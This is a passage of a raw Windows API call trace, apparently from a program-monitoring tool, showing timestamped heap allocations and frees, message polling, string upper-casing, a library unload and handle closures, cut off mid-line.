[0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.441] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0261.442] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0261.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.442] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.443] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.443] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.443] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.444] FreeLibrary (hLibModule=0x74d40000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.444] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.444] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0261.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0261.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0261.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.446] CloseHandle (hObject=0x294) returned 1 [0261.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0261.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0261.450] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.452] CloseHandle (hObject=0x268) returned 1 [0261.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0261.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0261.458] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0261.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0261.461] HeapFree (in: hHeap=0x25c0000, 